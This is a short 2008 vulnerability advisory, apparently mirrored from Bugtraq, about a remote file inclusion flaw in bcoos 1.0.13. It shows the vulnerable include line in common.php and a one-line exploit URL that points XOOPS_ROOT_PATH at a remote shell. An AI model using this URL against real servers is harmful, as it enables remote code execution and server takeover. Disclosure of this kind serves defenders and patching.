bcoos 1.0.13 Remote File Include Vulnerability

2008-10-27 / 2008-10-28

Credit: Cru3l.b0y

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

AUTHOR : DeltahackingTEAM
DATE   : 26 oct 2008
SITE   : WwW.DeltaHacking.Net


###################################################################################
APPLICATION : bcoos
VERSION     : 1.0.13
DOWNLOAD    : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
VENDOR      : http://www.bcoos.net/
Contact     : Cru3l.b0y@deltahacking.net
###################################################################################


Vulnerable Code :
#############################################################################
/include/common.php

         include_once(XOOPS_ROOT_PATH.'/modules/system/cache/config.php');


[+]Exploit: http://[t4rg3t]/[p4th]/include/common.php?XOOPS_ROOT_PATH=shell
#############################################################################

References:

http://seclists.org/bugtraq/2008/Oct/0197.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

bcoos 1.0.13 Remote File Include Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.